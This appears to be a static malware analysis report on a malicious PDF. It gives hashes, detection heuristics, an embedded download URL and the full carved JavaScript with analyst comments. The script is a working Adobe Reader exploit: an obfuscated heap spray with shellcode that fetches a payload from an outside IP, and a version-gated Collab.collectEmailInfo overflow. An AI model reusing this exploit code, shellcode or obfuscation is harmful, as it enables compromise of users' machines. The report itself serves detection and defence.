Malicious PDF — malware analysis report

Static analysis result for SHA-256 dc8730e170bbdd14…

MALICIOUS

PDF

2.9 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-06-30
MD5: b2cdf2e1aee00a75b60cea0d724c448b SHA-1: d2557e05ff1dbdb183298607a9bdeba35c208f50 SHA-256: dc8730e170bbdd14cd55b06b68bd87e818d5efbc1e6460c2823868b472580022
Risk Score: 250

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var Kg8CRs7 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u794 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://85.17.166.231/gtest2/load.php?id=0&e=01&sid= Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 3120 bytes
SHA-256: e7ec71f08ec797539fc4e34cadec5bfcc5eee1d166224c878ea162bf0bba05ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/**
 * Analyst annotations on the script carved from PDF /JS object 13 (artifact
 * javascript_obj0013_001.js above). The code is reproduced byte-for-byte;
 * only comments have been added. Structure: an outer wrapper that declares a
 * spray array, two helpers (a string-padding routine and the spray builder),
 * and a trigger routine that gates on the Reader version and then calls a
 * Collab method whose name is hidden by digit-stuffing. The wrapper invokes
 * the trigger immediately on its last line, so the whole chain runs as soon
 * as the document's JavaScript action fires.
 */
function G9rhAVV1za2O() {	var QFfhlYk = new Array(); 
		// Pads `vxdoYfDgwSMdD` by repeated self-concatenation until
		// length*2 reaches `vXsELukk`, then trims to exactly vXsELukk/2
		// characters. length*2 looks like a byte count for UTF-16 strings
		// (the unescape'd %uXXXX data is 16-bit per unit) — TODO confirm.
		function hqn3WPz1KSjTJR(vxdoYfDgwSMdD, vXsELukk) { 
			while (vxdoYfDgwSMdD.length*2<vXsELukk){vxdoYfDgwSMdD += vxdoYfDgwSMdD;} 
			vxdoYfDgwSMdD = vxdoYfDgwSMdD.substring(0,vXsELukk/2);
			return vxdoYfDgwSMdD; 
		}

		// Spray builder (the PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY finding).
		// Fills the outer `QFfhlYk` array with identical blocks of
		// padding + shellcode. Detection hooks: unescape() of long %uXXXX
		// runs, the 0x0c0c0c0c constant, and a block-size arithmetic pattern.
		function X6MUZgwCVtqK() { 
			// 0x0c0c0c0c is the address the spray is sized against (see the
			// block-count computation below); the same value is used as the
			// filler in TqynPGa6loe (%u0c0c%u0c0c).
			var oX9S1U6EPS = 0x0c0c0c0c; 
			// %uXXXX-encoded shellcode (recovered separately as
			// javascript_obj0013_001_shellcode_00.bin). Leading %u9090 units are
			// 0x90 bytes (x86 NOP); the trailing %u7468%u7074%u2F3A... run is the
			// little-endian ASCII of the http://85.17.166.231/gtest2/load.php?...
			// URL listed under Embedded URL above, matching the
			// PDF_JS_SHELLCODE_DOWNLOAD_URL finding.
			var Kg8CRs7 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u382F%u2E35%u3731%u312E%u3636%u322E%u3133%u672F%u6574%u7473%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u2630%u3D65%u3130%u7326%u6469%u003D");
			// Per-block size (0x400000) and the padding needed so that
			// padding + shellcode + 0x38 fills one block.
			var jYbdm17ZIn = 0x400000;
			var NEYbQX685 = Kg8CRs7.length * 2;
			var vXsELukk = jYbdm17ZIn - (NEYbQX685+0x38);
			// Padding starts as two 0x9090 units and is grown by the helper above.
			var vxdoYfDgwSMdD = unescape("%u9090%u9090");
			vxdoYfDgwSMdD = hqn3WPz1KSjTJR(vxdoYfDgwSMdD, vXsELukk);
			// Number of blocks = (0x0c0c0c0c - 0x400000) / 0x400000.
			var yovHOwGUUM44 = (oX9S1U6EPS - 0x400000)/jYbdm17ZIn;
			
			for (var FTgXAdjgWa1y7Y=0;FTgXAdjgWa1y7Y<yovHOwGUUM44;FTgXAdjgWa1y7Y++) { 
				QFfhlYk[FTgXAdjgWa1y7Y] = vxdoYfDgwSMdD + Kg8CRs7;
			}
		}

		// Trigger routine: version-gated call into the Collab object.
		function TqynPGa6loe() {
			// Reads the Acrobat JS API `app.viewerVersion`, strips every
			// non-digit, and keeps the first three digits. Any `app.viewerVersion`
			// read followed by digit extraction is a useful triage signature.
			var DBSNGi8 = app.viewerVersion.toString();
			DBSNGi8 = DBSNGi8.replace(/\D/g,"");
			var kPSafx63191 = new Array(DBSNGi8.charAt(0),DBSNGi8.charAt(1),DBSNGi8.charAt(2));
			// Digit-stuffed method name; removing \d yields "collectEmailInfo".
			var Q1mo1k = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			// Version gate. charAt() yields strings, so == and < coerce to
			// numbers. Assuming a major.minor.patch digit layout, this admits
			// 8.0.x, 8.1.0, 8.1.1, 7.0.x and anything below 7 — TODO confirm
			// against the viewerVersion format of the targeted Reader builds.
			if ((kPSafx63191[0] == 8 &&
			((kPSafx63191[1] == 1 && kPSafx63191[2] < 2) || kPSafx63191[1] < 1)) || 
			(kPSafx63191[0] == 7 && kPSafx63191[1] < 1) || 
			(kPSafx63191[0] < 7)) {
			        var oXffC59mk6s = Collab;
				// Build the spray first, then the oversized argument.
				X6MUZgwCVtqK();
				// 0x0c0c filler doubled until at least 44952 UTF-16 units long.
				var byVOE6U1u0N0Lp = unescape("%u0c0c%u0c0c");
				// Digit-stuffed property name; removing \d yields "collabStore".
				var YzOtzI3N = "c24ol2la572bS8to2445r5e00";
				while(byVOE6U1u0N0Lp.length < 44952) byVOE6U1u0N0Lp += byVOE6U1u0N0Lp;
				// Resolves both names by stripping digits at runtime, calls
				// Collab.collectEmailInfo with the oversized `msg`, and stores the
				// result on `this` (presumably the document/global object in
				// Reader's non-strict script context). Static detectors that key on
				// the literal API name will not see it; match on the
				// replace(/\d/g,"") + bracket-call pattern instead.
				this[YzOtzI3N.replace(new RegExp(/\d/g),"")] = oXffC59mk6s[Q1mo1k.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              byVOE6U1u0N0Lp});
			} 
		}
		// Fires the trigger as soon as the wrapper itself is invoked.
		TqynPGa6loe();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 464 bytes
SHA-256: d792dbee0b7e8970c65ec781f7c0e1244e3d0b09e1740c3fa42d8f511e8b9028